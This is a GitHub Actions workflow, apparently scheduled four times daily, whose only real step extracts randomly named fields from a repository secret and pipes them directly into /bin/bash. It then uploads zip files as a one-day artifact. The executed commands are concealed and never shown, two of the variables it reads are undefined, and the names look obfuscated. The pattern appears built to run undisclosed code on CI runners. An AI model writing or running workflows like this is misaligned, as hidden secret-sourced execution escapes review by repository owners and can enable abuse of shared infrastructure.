name: chuangdayuli
on:
  workflow_dispatch:

  schedule:
    - cron: '52 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chuangdayuli
        env:
          axavs8: ${{ secrets.axavs8 }}
        run: |
          printf '%s' "$axavs8" | jq -r .fhvq98589 | /bin/bash
          printf '%s' "$lhcn38311" | jq -r .do6908 | /bin/bash
          printf '%s' "$sg34" | jq -r .tqbve2 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 4qCT4kFj
          path: "*.zip"
          retention-days: 1
